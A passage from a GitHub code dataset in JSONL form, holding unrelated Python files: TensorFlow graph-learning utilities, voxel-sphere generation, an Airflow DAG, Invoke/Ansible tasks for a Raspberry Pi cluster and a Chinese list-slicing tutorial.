f\"previous_runs/{cfg.env.name}/{cfg.task.name}/{run._attrs['name']}\"\n )\n model_name = \"best_checkpoint.zip\"\n run.file(model_name).download(root=model_path, exist_ok=True)\n return f\"{model_path}/{model_name}\", cfg\n\n def save_model(self, model_path: str):\n wandb.save(model_path)\n\n def save_video(self, video_path: str, num_timesteps: int):\n wandb.log({\"eval_video\": wandb.Video(video_path)}, step=num_timesteps)\n\n def sb3_logger(self) -> sb3logger.Logger:\n writer = WandbWriter()\n return sb3logger.Logger(self.output_dir, output_formats=[writer])\n\n def finish(self):\n return self.run.finish()\n","repo_name":"aa4cc/sk8o-rl","sub_path":"training/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"37717374011","text":"import numpy as np\nimport imageio\n\nfrom skimage.external import tifffile as tif\n\ndef sphere2(shape, radii, position):\n\t\n\tarr = np.zeros(shape, dtype=float)\n\tfor myIdx, radius in enumerate(radii):\n\t\t# assume shape and position are both a 3-tuple of int or float\n\t\t# the units are pixels / voxels (px for short)\n\t\t# radius is a int or float in px\n\t\tsemisizes = (radius,) * 3\n\n\t \t# genereate the grid for the support points\n\t\t# centered at the position indicated by position\n\t\tgrid = [slice(-x0, dim - x0) for x0, dim in zip(position[myIdx], shape)]\n\t\tposition2 = np.ogrid[grid]\n\t\t# calculate the distance of all points from `position` center\n\t\t# scaled by the radius\n\t\t#arr = np.zeros(shape, dtype=float)\n\t\tfor x_i, semisize in zip(position2, semisizes):\n\t\t\tarr += (np.abs(x_i / semisize) ** 2)\n\t\t# the inner part of the sphere will have distance below 1\n\t\n\treturn arr <= 1.0\n\ndef sphere(shape, radius, position):\n\t# assume shape and position are both a 3-tuple of int or float\n\t# the units are pixels / voxels (px for short)\n\t# radius is a int or float in px\n\tsemisizes = (radius,) * 3\n\n\t# genereate the grid for the support points\n\t# centered at the position indicated by position\n\tgrid = [slice(-x0, dim - x0) for x0, dim in zip(position, shape)]\n\tposition = np.ogrid[grid]\n\t# calculate the distance of all points from `position` center\n\t# scaled by the radius\n\tarr = np.zeros(shape, dtype=float)\n\tfor x_i, semisize in zip(position, semisizes):\n\t\tarr += (np.abs(x_i / semisize) ** 2)\n\t# the inner part of the sphere will have distance below 1\n\treturn arr <= 1.0\n\narr = sphere((256, 256, 256), 10, (100, 100, 100))\nprint('arr.shape:', arr.shape, type(arr), arr.dtype)\n#intArr = arr.astype('int8')\n\narr2 = sphere((256, 256, 256), 20, (50, 40, 50))\narr3 = sphere((256, 256, 256), 30, (150, 120, 150))\n#intArr2 = arr2.astype('int8')\n\nsaveArr = arr + arr2 + arr3\nsaveArr = saveArr.astype('int8')\nprint('saveArr.shape:', saveArr.shape, type(saveArr), saveArr.dtype)\ntif.imsave('a.tif', saveArr, bigtiff=True)\n\nmyShape = (256,1024,1024)\nmyRadii = [10,20,30,40,50,60]\nmyPositions = [\n\t(50, 40, 50),\n\t(100, 100, 100),\n\t(150, 120, 150),\n\t(100, 300, 300),\n\t(100, 500, 500),\n\t(120, 700, 700),\n\t]\n#myArr = sphere2(myShape, myRadii, myPositions)\nfor idx, radius in enumerate(myRadii):\n\tprint(idx)\n\tarr = sphere(myShape, myRadii[idx], myPositions[idx])\n\tif idx==0:\n\t\tsaveArr = arr\n\telse:\n\t\tsaveArr += arr\nmyArr = saveArr.astype('int8')\n\t\t\nprint('myArr.shape:', myArr.shape, type(myArr), myArr.dtype)\ntif.imsave('b.tif', myArr, bigtiff=True)\n\n#imageio.imwrite('sphere.tif', intArr)\n# this will save a sphere in a boolean array\n# the shape of the containing array is: (256, 256, 256)\n# the position of the center is: (127, 127, 127)\n# if you want is 0 and 1 just use .astype(int)\n# for plotting it is likely that you want that\n\n# just for fun you can check that the volume is matching what expected\nmySum = np.sum(arr)\n# gives: 4169\nprint('mySum:', mySum)\n\nmySum2 = 4 / 3 * np.pi * 10 ** 3\nprint('mySum2:', mySum2)\n# gives: 4188.790204786391\n# (the two numbers do not match exactly because of the discretization error)\n","repo_name":"cudmore/bImPy","sub_path":"sandbox/bSpere.py","file_name":"bSpere.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"28804661640","text":"import requests\n\nfrom datetime import timedelta, datetime\n\nfrom airflow import DAG\nfrom airflow.decorators import task\nfrom airflow.operators.subdag import SubDagOperator\n\nfrom dags.sub_dag.child_dag import subdag_factory\n\ndefault_args = {\"start_date\": datetime(2022, 1, 7)}\n\n\n@task.python(multiple_outputs=True)\ndef get_response():\n return requests.get('https://jsonplaceholder.typicode.com/todos/1').json()\n\n\n@task.python\ndef read_file():\n with open(file='file.csv', mode='r') as f:\n for line in f.readlines():\n print(line)\n\n\nwith DAG(dag_id=\"main\", description=\"Main Dag - SubDag example\", dagrun_timeout=timedelta(minutes=10),\n default_args=default_args) as dag:\n\n transform = SubDagOperator(\n task_id=\"process\",\n subdag=subdag_factory(parent_dag_id=\"main\", subdag_dag_id=\"process\", default_args=default_args),\n poke_interval=3\n )\n\n get_response() >> transform >> read_file()\n","repo_name":"jbeltranleon/dags-airflow-certification","sub_path":"dags/sub_dag/main_dag.py","file_name":"main_dag.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15796262804","text":"import numpy as np\nimport tensorflow as tf\nimport six\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops.losses import util as tf_losses_utils\nfrom tensorflow.keras import backend as K\nfrom tensorflow.python.keras.utils import tf_utils\nfrom tensorflow.python.keras.utils import losses_utils\nfrom tensorflow.python.keras.utils import metrics_utils\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.keras.utils.tf_utils import is_tensor_or_variable\nfrom tensorflow.python.distribute import distribution_strategy_context\nfrom functools import partial\n\ndef euclidean_distance(x, use_fp16=False, use_sqrt=False):\n #x: batchsize*node*featdim => batchsize*node*node\n dot_product = tf.matmul(x, tf.transpose(x, perm=[0, 2, 1]))\n square_norm = tf.linalg.diag_part(dot_product)\n\n distances = tf.expand_dims(square_norm, 2) - 2.0 * dot_product + tf.expand_dims(square_norm, 1)\n distances = tf.maximum(distances, 0.0)\n\n mask = tf.cast(tf.equal(distances, 0.0), tf.float32 if not use_fp16 else tf.float16)\n distances = distances + mask * (1e-16 if not use_fp16 else 1e-5)\n\n if use_sqrt:\n distances = tf.sqrt(distances)\n distances = distances * (1.0 - mask)\n\n return distances\n\ndef norm_lap(A):\n D = tf.reduce_sum(A, axis=2)\n inv_sqrt = tf.pow(D, -0.5)\n inv_sqrt = tf.where(tf.math.is_inf(inv_sqrt), tf.zeros_like(inv_sqrt), inv_sqrt)\n inv_sqrt = tf.linalg.diag(inv_sqrt)\n\n return tf.matmul(tf.matmul(inv_sqrt, tf.linalg.diag(D)- A), tf.transpose(inv_sqrt, [0, 2, 1]))\n\ndef adaptive_sigma(dx, y, eps=1e-3, use_fp16=False):\n T = tf.cast(tf.equal(tf.expand_dims(y,1), tf.expand_dims(y, 2)), tf.float32 if not use_fp16 else tf.float16)\n F =1.0-T\n P = tf.multiply(T, dx)\n N = tf.multiply(F, dx)\n\n a = tf.reduce_sum(P, axis=[1,2], keepdims=True)/tf.reduce_sum(T, axis=[1,2], keepdims=True)\n b = tf.reduce_sum(N, axis=[1,2], keepdims=True)/tf.reduce_sum(F, axis=[1,2], keepdims=True)\n\n a2 = tf.math.square(a)\n b2 = tf.math.square(b+eps)\n\n sigma = tf.math.sqrt((a2-b2)/(2.0*tf.math.log(a2/b2)))\n\n return sigma\n\ndef knn_edge(dx, nodenum, gamma, eps=1e-7, use_fp16=False):\n batchsize = tf.shape(dx)[0]\n \n #remove self\n dx = tf.linalg.set_diag(dx, (1e10 if not use_fp16 else 1e5)*tf.ones([batchsize, nodenum], dtype=tf.float32 if not use_fp16 else tf.float16))\n\n #allgraph: labeled nodes vs labeled nodes\n _, indices = tf.nn.top_k(-dx, k=gamma, sorted=False)\n\n bindices = tf.tile(tf.expand_dims(tf.range(0, batchsize)* nodenum * nodenum, 1), (1, nodenum*gamma))\n gindices = tf.reshape(tf.tile(tf.expand_dims(tf.range(0, nodenum) * nodenum, 1),(batchsize, gamma)), [batchsize,-1])\n gindices = gindices + tf.reshape(indices, [batchsize, -1]) + bindices\n gindices = tf.reshape(gindices,(-1,1))\n n_mask = tf.scatter_nd(gindices, tf.ones(tf.shape(gindices), tf.float32 if not use_fp16 else tf.float16), tf.shape(tf.reshape(dx,[-1,1])))\n n_mask = tf.reshape(n_mask, tf.shape(dx))\n\n n_mask = tf.maximum(n_mask, tf.transpose(n_mask, [0,2,1]))\n\n return n_mask\n\ndef binarize(y, c):\n return tf.where(tf.equal(y, c), tf.ones_like(y, tf.float32), tf.negative(tf.ones_like(y, tf.float32)))\n\ndef binarize_gs(y):\n return tf.multiply(tf.where(tf.equal(y, 1), tf.ones_like(y, tf.float32), tf.negative(tf.ones_like(y, tf.float32))), tf.cast(tf.not_equal(y, 0), tf.float32))\n\ndef edge_weighting(dx, sigma=None, s=None, e=None, eps=1e-3, directed=False, use_fp16=False):\n if s is not None:\n ms = tf.sqrt(eps + tf.multiply(tf.expand_dims(s, 2), tf.expand_dims(s, 1)))\n dx = tf.multiply(dx, ms)\n\n if sigma is not None:\n if sigma is tf.Tensor:\n w = tf.exp(-tf.square(dx)/(2.0*tf.square(sigma)))\n else:\n w = tf.exp(-tf.square(dx)/(2.0*(sigma**2)))\n else:\n w = tf.exp(-tf.square(dx))\n\n if not directed:\n w = tf.maximum(w, tf.transpose(w, [0,2,1]))\n\n mask = tf.where(tf.greater_equal(w, 1e-5), tf.ones_like(w), tf.zeros_like(w))\n w = tf.multiply(w, mask)\n\n if e is None:\n wdx = dx\n else:\n wdx = tf.cast(tf.less_equal(e, eps), tf.float32 if not use_fp16 else tf.float16) * (1e10 if not use_fp16 else 1e5) + dx\n\n return w, wdx\n\ndef edgeattention(gs, sgs, labelednum, unlabelednum, thres=2.0):\n batchsize = tf.shape(gs)[0]\n absdy = tf.math.abs(sgs - gs)\n m = tf.less_equal(absdy, thres)\n mask = tf.equal(tf.expand_dims(m, 1), tf.expand_dims(m,2))\n mask = tf.where(mask, tf.ones_like(mask, tf.float32), tf.zeros_like(mask, tf.float32))\n return tf.slice(tf.cast(tf.logical_not(m), tf.float32), [0, labelednum], [batchsize, unlabelednum]), mask\n\ndef glr_fidelity(a, y, mu, labelednum, unlabelednum, nodenum, ally=False, normlap=False, kappafactor=1.0):\n batchsize = tf.shape(a)[0]\n\n A = a - tf.linalg.diag(tf.linalg.diag_part(a))\n D = tf.reduce_sum(A, axis=2)\n if normlap:\n L = norm_lap(A)\n else:\n L = tf.linalg.diag(D) - A\n\n if ally:\n gs = tf.reshape(y, (batchsize, nodenum, 1))\n else:\n gs = tf.reshape(tf.concat((y, tf.zeros((batchsize, unlabelednum))), axis=1), (batchsize, nodenum, 1))\n\n if mu is None:\n kappa = 60.0 * kappafactor\n mu_scale = 0.6667\n mu_max = (kappa-1.0)/(2.0* tf.reduce_max(D, axis=1, keepdims=True))\n mu_max = tf.expand_dims(mu_max, -1)\n mu = mu_scale * mu_max\n\n I = tf.eye(nodenum, batch_shape=[batchsize])\n\n sgs = tf.linalg.solve(I+mu*L, gs)\n\n sgs = tf.reshape(sgs, (batchsize, nodenum))\n\n if not ally:\n labeled_gs = tf.slice(y, [0,0], [batchsize, labelednum])\n labeled_sgs = tf.slice(sgs, [0,0], [batchsize, labelednum])\n\n all_gs = tf.concat((labeled_gs, 1000.0*tf.ones((batchsize, unlabelednum), tf.float32)), axis=1)\n all_sgs = tf.concat((labeled_sgs, -1000.0*tf.ones((batchsize, unlabelednum), tf.float32)), axis=1)\n else:\n all_gs = y\n all_sgs = sgs\n\n return sgs, all_gs, all_sgs\n\ndef postprocess_grads(grads, **kwargs):\n clip_norm = kwargs.get(\"clip_norm\", None)\n grads = [None if grad is None else tf.where(tf.math.is_nan(grad), tf.zeros_like(grad), grad) for grad in grads]\n grads = [None if grad is None else tf.where(tf.math.is_inf(grad), tf.zeros_like(grad), grad) for grad in grads]\n if clip_norm is not None:\n grads = [None if grad is None else tf.clip_by_norm(grad, clip_norm) for grad in grads]\n return grads\n\n#x: batchsize*nodenum*nodenum (dists)\n#out: idx = batchsize*nodenum*k\n# mask = batchsize*nodenum*k\ndef knn1d(x, nodenum, batchsize, k=6, eps=1e-7):\n #remove selfloop edge\n noselfx = tf.linalg.set_diag(x, -1e10*tf.ones((batchsize, nodenum)))\n val, idx = tf.nn.top_k(noselfx, k=k)\n mask = tf.cast(tf.greater(val, eps), tf.float32)\n return idx, mask\n\n#x: batchsize*nodenum*featdim (features)\n#mau: batchsize*nodenum\n#out: batchsize*nodenum*(k+1)*featdim\ndef knnfeature(x, idx, mask, batchsize, nodenum, featdim, k=6, mau=None):\n bidx = tf.range(batchsize) * nodenum\n bidx = tf.reshape(bidx, [batchsize, 1, 1])\n\n gx = tf.reshape(x, [-1, featdim])\n nx = tf.gather(gx, idx+bidx)\n cx = tf.expand_dims(x, axis=-2)\n tcx = tf.tile(cx, [1, 1, k, 1])\n\n nf = nx-tcx #nf=batchsize*nodenum*k*featdim\n m = tf.expand_dims(mask, axis=-1) #m=batchsize*nodenum*k*1\n mnf = tf.multiply(m, nf)\n\n mm = tf.clip_by_value(mau, 0, k)\n mm = tf.sequence_mask(mm, k, tf.float32)\n mnf = tf.multiply(mnf, tf.expand_dims(mm, 3))\n\n return tf.transpose(tf.concat([cx, mnf], axis=-2), [0, 1, 3, 2])\n\ndef sparse_knn(dx, k, nodenum, eps=1e-7):\n batchsize = tf.shape(dx)[0]\n nodenum = tf.shape(dx)[1]\n\n bindices = tf.tile(tf.expand_dims(tf.range(batchsize)* nodenum * nodenum, 1), (1, nodenum*nodenum))\n gindices = tf.reshape(tf.tile(tf.expand_dims(tf.range(nodenum) * nodenum, 1),(batchsize, nodenum)), [batchsize,-1])\n gindices = gindices + bindices\n\n dx = tf.linalg.set_diag(dx, 1e10*tf.ones([batchsize, nodenum]))\n valid_mask =tf.cast(tf.less(dx, 1e8), tf.float32)\n\n sortedinds = tf.argsort(dx, 2, direction='ASCENDING', stable=True)\n seqmask = tf.sequence_mask(k, nodenum, tf.int32)\n sortedinds = sortedinds *seqmask + (seqmask - 1)*1000000\n sortedginds = tf.reshape(tf.reshape(sortedinds, (batchsize, nodenum*nodenum))+gindices, (-1,))\n\n bool_mask = tf.greater_equal(sortedginds, 0)\n sortedginds = tf.reshape(tf.boolean_mask(sortedginds, bool_mask), (-1,1))\n\n sparse_mask = tf.reshape(tf.scatter_nd(sortedginds, tf.ones(tf.shape(sortedginds), tf.float32), tf.shape(tf.reshape(dx,[-1,1]))), tf.shape(dx)) * valid_mask\n\n sparse_mask = tf.math.maximum(sparse_mask, tf.transpose(sparse_mask, [0,2,1]))\n\n return sparse_mask\n\ndef res_net_block(input_data, filters, conv_size):\n x = tf.keras.layers.Conv1D(filters, conv_size, activation=None, padding='same')(input_data)\n x = tf.keras.layers.Add()([x, input_data])\n x = tf.keras.layers.Activation('relu')(x)\n return x\n\n\ndef dynglr(**kwargs):\n #graph weighting1\n inputs = tf.keras.Input(shape=(kwargs.get(\"fc_inputdim\", 2048),))\n x = tf.keras.layers.Reshape((32, int(kwargs.get(\"fc_inputdim\", 2048)/32)))(inputs)\n x = tf.keras.layers.Conv1D(256, 3, activation='relu', use_bias=False)(x)\n shallows = tf.keras.layers.MaxPooling1D(2)(x)\n x = res_net_block(shallows, 256, 3)\n x = tf.keras.layers.GlobalAveragePooling1D()(x)\n outputs = tf.keras.layers.Dense(32)(x)\n model_gw1 = tf.keras.Model(inputs, [outputs, shallows])\n\n #graph update\n tau = kwargs.get('dynglr_tau', 3)\n inputs1 = tf.keras.Input(shape=(15, 256)) #node features\n inputs2 = tf.keras.Input(shape=((tau+1)*2,)) #tau neigbors' labels\n x1 = tf.keras.layers.Conv1D(112, 3, activation='relu', use_bias=False)(inputs1)\n x1 = tf.keras.layers.GlobalAveragePooling1D()(x1)\n x2 = tf.keras.layers.Dense(16, activation='relu', use_bias=False)(inputs2)\n shallows1 = tf.keras.layers.Concatenate()([x1, x2])\n x12 = tf.keras.layers.Reshape((16, 8))(shallows1)\n x12 = tf.keras.layers.Conv1D(128, 3, activation='relu', use_bias=False)(x12)\n x12 = tf.keras.layers.GlobalAveragePooling1D()(x12)\n outputs1 = tf.keras.layers.Add()([x12, shallows1])\n model_gu = tf.keras.Model([inputs1, inputs2], [outputs1, shallows1])\n\n #graph weighting2\n inputs3 = tf.keras.Input(shape=(15, 256))\n inputs4 = tf.keras.Input(shape=(128,))\n\n x3 = tf.keras.layers.Conv1D(32, 3, activation='relu', use_bias=False)(inputs3)\n x3 = tf.keras.layers.GlobalAveragePooling1D()(x3)\n x4 = tf.keras.layers.Reshape((16, 8))(inputs4)\n x4 = tf.keras.layers.Conv1D(64, 3, activation='relu', use_bias=False)(x4)\n x4 = tf.keras.layers.GlobalAveragePooling1D()(x4)\n\n outputs2 = tf.keras.layers.Concatenate()((x3, x4))\n model_gw2 = tf.keras.Model([inputs3, inputs4], outputs2)\n\n return model_gw1, model_gu, model_gw2\n\n\ndef dynglr_knnfeature(y, wd, tau, mau=None):\n batchsize = tf.shape(y)[0]\n nodenum = tf.shape(y)[1]\n\n if tau is not None and tau!=0:\n idx, mask = knn1d(wd, nodenum, batchsize, tau)\n fy = knnfeature(y, idx, mask, batchsize, nodenum, 2, tau, mau)\n else:\n fy = y\n\n return fy\n\ndef tf_arch(classes, **kwargs):\n return dynglr(**kwargs)\n\n\ndef is_sequence(obj):\n return hasattr(type(obj), '__iter__')\n\ndef lr_constant(lr, step):\n return lr\n\ndef lr_piecewiseconstant(lrs, stairs, step):\n stair_s = -1\n for i in range(len(stairs)):\n if step=len(stairs):\n return lrs[-1]\n ret =lrs[stair_s] + (step - stairs[stair_s])*(lrs[stair_s+1] - lrs[stair_s]) / (stairs[stair_s+1] - stairs[stair_s])\n return ret\n\ndef lr_piecewiselinear(knots, vals, step):\n return np.interp(step, knots, vals)\n\ndef get_arch_lr(**kwargs):\n lr_mode= kwargs.get(\"lr_mode\", 'constant')\n if lr_mode=='constant':\n return partial(lr_constant, kwargs.get(\"lr_init\", 0.001))\n elif lr_mode=='piecewise_constant':\n return partial(lr_piecewiseconstant, kwargs.get(\"lrs\", [0.001, 0.0005, 0.0001, 0.0005, 0.0001, 0.00005]), kwargs.get(\"lr_stairs\", [40, 80, 140, 220, 320, 440]))\n elif lr_mode=='piecewise_linear':\n return partial(lr_piecewiselinear, kwargs.get(\"lr_knots\", [0, 2, 8]), kwargs.get(\"lr_vals\", [0, 1.0, 0.1]))\n\nclass CustomLoss2(object):\n def __init__(self, reduction=losses_utils.ReductionV2.AUTO, name=None):\n losses_utils.ReductionV2.validate(reduction)\n self.reduction = reduction\n self.name = name\n\n def __call__(self, y_true, y_pred, w, sample_weight=None):\n scope_name = 'lambda' if self.name == '' else self.name\n graph_ctx = tf_utils.graph_context_for_symbolic_tensors(\n y_true, y_pred, w, sample_weight)\n with K.name_scope(scope_name or self.__class__.__name__), graph_ctx:\n losses = self.call(y_true, y_pred, w)\n return losses_utils.compute_weighted_loss(\n losses, sample_weight, reduction=self._get_reduction())\n\n @classmethod\n def from_config(cls, config):\n return cls(**config)\n\n def get_config(self):\n return {'reduction': self.reduction, 'name': self.name}\n\n def call(self, y_true, y_pred, w):\n NotImplementedError('Must be implemented in subclasses.')\n\n def _get_reduction(self):\n if distribution_strategy_context.has_strategy() and (\n self.reduction == losses_utils.ReductionV2.AUTO or\n self.reduction == losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE):\n raise ValueError(\n 'Please use `tf.keras.losses.Reduction.SUM` or '\n '`tf.keras.losses.Reduction.NONE` for loss reduction when losses are '\n 'used with `tf.distribute.Strategy` outside of the built-in training '\n 'loops. You can implement '\n '`tf.keras.losses.Reduction.SUM_OVER_BATCH_SIZE` using global batch '\n 'size like:\\n```\\nwith strategy.scope():\\n'\n ' loss_obj = tf.keras.losses.CategoricalCrossentropy('\n 'reduction=tf.keras.losses.reduction.NONE)\\n....\\n'\n ' loss = tf.reduce_sum(loss_obj(labels, predictions)) * '\n '(1. / global_batch_size)\\n```\\nPlease see '\n 'https://www.tensorflow.org/alpha/tutorials/distribute/training_loops'\n ' for more details.')\n\n if self.reduction == losses_utils.ReductionV2.AUTO:\n return losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE\n return self.reduction\n\nclass CustomLossFunctionWrapper2(CustomLoss2):\n def __init__(self, fn, reduction=losses_utils.ReductionV2.AUTO, name=None, **kwargs):\n super(CustomLossFunctionWrapper2, self).__init__(reduction=reduction, name=name)\n self.fn = fn\n self._fn_kwargs = kwargs\n\n def call(self, y_true, y_pred, w):\n if tensor_util.is_tensor(y_pred) and tensor_util.is_tensor(y_true) and tensor_util.is_tensor(w):\n y_pred, y_true = tf_losses_utils.squeeze_or_expand_dimensions(\n y_pred, y_true)\n return self.fn(y_true, y_pred, w, **self._fn_kwargs)\n\n def get_config(self):\n config = {}\n for k, v in six.iteritems(self._fn_kwargs):\n config[k] = K.eval(v) if tf_utils.is_tensor_or_variable(v) else v\n base_config = super(CustomLossFunctionWrapper2, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\ndef tripletloss(y, dx, **kwargs):\n alpha = kwargs.get('margin', 10.0)\n T = tf.cast(tf.equal(tf.expand_dims(y,1), tf.expand_dims(y, 2)), tf.float32)\n F = tf.subtract(1.0, T)\n P = tf.multiply(T, dx)\n N = tf.multiply(F, tf.nn.relu(tf.subtract(alpha, dx)))\n return tf.reduce_mean(P+N)\n\ndef tripletglrloss(y, dx, w, **kwargs):\n alpha = kwargs.get('margin', 10.0)\n T = tf.cast(tf.equal(tf.expand_dims(y,1), tf.expand_dims(y, 2)), tf.float32)\n F = tf.subtract(1.0, T)\n P = tf.multiply(T, dx)\n N = tf.multiply(F, tf.nn.relu(tf.subtract(alpha, dx)))\n return tf.reduce_mean(tf.multiply(P+N, w))\n\nclass TripletGLRLossError(CustomLossFunctionWrapper2):\n def __init__(self, reduction=losses_utils.ReductionV2.AUTO, name='tripletglrloss_error', **kwargs):\n super(TripletGLRLossError, self).__init__(tripletglrloss, name=name, reduction=reduction, **kwargs)\n\nclass CustomMeanMetricWrapper2(tf.keras.metrics.Mean):\n def __init__(self, fn, name=None, dtype=None, **kwargs):\n super(CustomMeanMetricWrapper2, self).__init__(name=name, dtype=dtype)\n self._fn = fn\n self._fn_kwargs = kwargs\n\n def update_state(self, y_true, y_pred, w, sample_weight=None):\n y_true = math_ops.cast(y_true, self._dtype)\n y_pred = math_ops.cast(y_pred, self._dtype)\n w = math_ops.cast(w, self._dtype)\n\n [y_true, y_pred], sample_weight = \\\n metrics_utils.ragged_assert_compatible_and_get_flat_values(\n [y_true, y_pred], sample_weight)\n\n y_pred, y_true = tf_losses_utils.squeeze_or_expand_dimensions(\n y_pred, y_true)\n\n matches = self._fn(y_true, y_pred, w, **self._fn_kwargs)\n return super(CustomMeanMetricWrapper2, self).update_state(\n matches, sample_weight=sample_weight)\n\n def get_config(self):\n config = {}\n for k, v in six.iteritems(self._fn_kwargs):\n config[k] = K.eval(v) if is_tensor_or_variable(v) else v\n base_config = super(CustomMeanMetricWrapper, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\nclass TripletGLRLoss(CustomMeanMetricWrapper2):\n def __init__(self, name='tripletglrloss', dtype=None, **kwargs):\n super(TripletGLRLoss, self).__init__(tripletglrloss, name, dtype=dtype, **kwargs)","repo_name":"yemx21/DynGLR","sub_path":"models/tensorflow/utils_arch.py","file_name":"utils_arch.py","file_ext":"py","file_size_in_byte":17537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2808671045","text":"\"\"\"\nRaspberry Pi Cluster Admin tasks.\n\"\"\"\n\n# This file is used with Invoke - http://www.pyinvoke.org/\n#\n# Ansible is not a good task runner, repetitive actions with long command line\n# arguments are easier with Invoke.\n\nimport os\nimport sys\nimport ansible_runner\nfrom invoke import task, run\n\nif os.getuid() == 0:\n print (\"ERROR: Do not run as root.\")\n sys.exit(1)\n\nprint('\\n')\nprint(' --== Raspberry Pi Cluster administration ==-- ')\nprint('\\n')\n\n\n#\n# tasks for deployer (localhost)\n#\n\n@task\ndef deployer_ansible(c):\n \"\"\" Ansible deployer playbook on Psi (localhost). \"\"\"\n print(\"Running playbook-rpi-deployer.yml\")\n r = ansible_runner.run(private_data_dir='/home/pi/rpi_cluster/ansible', \n inventory='/etc/ansible/inventory/deploy', \n playbook='playbook-rpi-deployer.yml')\n print(\"{}: {}\".format(r.status, r.rc))\n print(\"Final status:\")\n print(r.stats)\n\n@task\ndef deployer_ssh_config(c):\n \"\"\" Generate ~/.ssh/config file from Ansible inventory. \"\"\"\n print(\"Creating new ssh config file\")\n c.run('ansible-playbook --connection=local -e \"runtherole=group-deployer-ssh-client\" -v playbook-rpi-single-role.yml')\n\n@task\ndef deployer_upgrade(c):\n \"\"\" Run upgrade maint role on Deployer. \"\"\"\n print(\"Updating\")\n c.run('ansible-playbook --connection=local -i /etc/ansible/inventory/deploy -e \"runtherole=upgrades\" -v playbook-rpi-single-role.yml')\n\n\n#\n# tasks for specific hosts. \n# \n# Examples:\n#\n# invoke ansible-ping compute\n# invoke ansible-ping all\n\n@task\ndef ansible_ping(c, hostname):\n \"\"\" Ansible Ping a host. example: invoke ansible-ping compute \"\"\"\n c.run(\"ansible %s -m ping;\" % hostname)\n\n@task\ndef ansible_sshd(c, hostname):\n \"\"\" Change default SSH login on new R-Pi. example: invoke ansible_sshd beta \"\"\"\n print(\"Running ssh-server role\")\n c.run('ansible-playbook --limit \"%s\" -e \"ansible_user=pi ansible_ssh_pass=raspberry host_key_checking=False runtherole=ssh-server\" -v playbook-rpi-single-role.yml' % hostname)\n\n@task\ndef serverspec_host(c, hostname):\n \"\"\" ServerSpec test a specific host. \"\"\"\n print(\"Running ServerSpec\")\n c.run(\"cd ../serverspec/ && bash run.sh %s\" % hostname)\n\n\n#\n# lanservices group\n#\n\n@task\ndef lanservices_main_ansible(c):\n \"\"\" Ansible services-main playbook on Alpha and Beta. \"\"\"\n print(\"Running playbook-rpi-lanservices.yml\")\n c.run('ansible-playbook -v playbook-rpi-lanservices.yml')\n\n\n#\n# compute group\n#\n\n@task\ndef compute_ansible_base(c):\n \"\"\" Ansible base playbook on compute group. \"\"\"\n print(\"Running playbook-rpi-compute.yml\")\n r = ansible_runner.run(private_data_dir='/home/pi/rpi_cluster/ansible', \n playbook='playbook-rpi-compute.yml')\n print(\"{}: {}\".format(r.status, r.rc))\n print(\"Final status:\")\n print(r.stats) \n\n@task\ndef compute_ansible_k3s(c):\n \"\"\" Setup lightweight Kubernetes cluster. \"\"\"\n print(\"Running playbook-rpi-compute-k3s.yml\")\n r = ansible_runner.run(private_data_dir='/home/pi/rpi_cluster/ansible', \n playbook='playbook-rpi-compute-k3s.yml')\n print(\"{}: {}\".format(r.status, r.rc))\n print(\"Final status:\")\n print(r.stats) \n\n\n#\n# tasks for all hosts\n#\n\n@task\ndef ansible_gather_facts(c):\n \"\"\" Gather facts on all hosts. \"\"\"\n print(\"Gathering facts\")\n c.run('ansible all -m setup &> /dev/null')\n\n@task\ndef ansible_maint(c):\n \"\"\" upgrade all R-Pi server hosts (includes rolling reboots). \"\"\"\n print(\"Running playbook-rpi-all-maint.yml\")\n r = ansible_runner.run(private_data_dir='/home/pi/rpi_cluster/ansible', \n playbook='playbook-rpi-all-maint.yml')\n print(\"{}: {}\".format(r.status, r.rc))\n print(\"Final status:\")\n print(r.stats) \n\n@task\ndef serverspec_cluster(c):\n \"\"\" ServerSpec tests. \"\"\"\n print(\"Running ServerSpec\")\n c.run('cd ../serverspec/ && bash run.sh')\n","repo_name":"craig-m/rpi_cluster","sub_path":"ansible/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"11099347812","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/3/22 9:01\n\"\"\"\n# ### 列表相关操作\n# (1)列表的拼接 (同元组) +\nlst1 = [1,2,3]\nlst2 = [4,5,6,1]\nlst = lst1 + lst2\nprint(lst)\n\n# (2)列表的重复 (同元组) *\nlst = [2,3]\nres = lst * 3\nprint(res)\n\n# (3)列表的切片 (同元组)\n# 语法 => 列表[::] 完整格式:[开始索引:结束索引:间隔值]\n\t# (1)[开始索引:] 从开始索引截取到列表的最后\n\t# (2)[:结束索引] 从开头截取到结束索引之前(结束索引-1)\n\t# (3)[开始索引:结束索引] 从开始索引截取到结束索引之前(结束索引-1)\n\t# (4)[开始索引:结束索引:间隔值] 从开始索引截取到结束索引之前按照指定的间隔截取列表元素值\n\t# (5)[:]或[::] 截取所有列表\n\n\nlst = [\"王11\",\"李22\",\"文33\",\"陈4\",\"温55\",\"刘66\",\"等两会\",\"刘77\"]\n# (1)[开始索引:] 从开始索引截取到列表的最后\nres = lst[3:]\nprint(res)\n\n# (2)[:结束索引] 从开头截取到结束索引之前(结束索引-1)\nres = lst[:]\nprint(res)\n\n# (3)[开始索引:结束索引] 从开始索引截取到结束索引之前(结束索引-1)\nres = lst[3:7]\nprint(res)\n\n# (4)[开始索引:结束索引:间隔值] 从开始索引截取到结束索引之前按照指定的间隔截取列表元素值\nres = lst[1:7:2]\nprint(res)\n\nres = 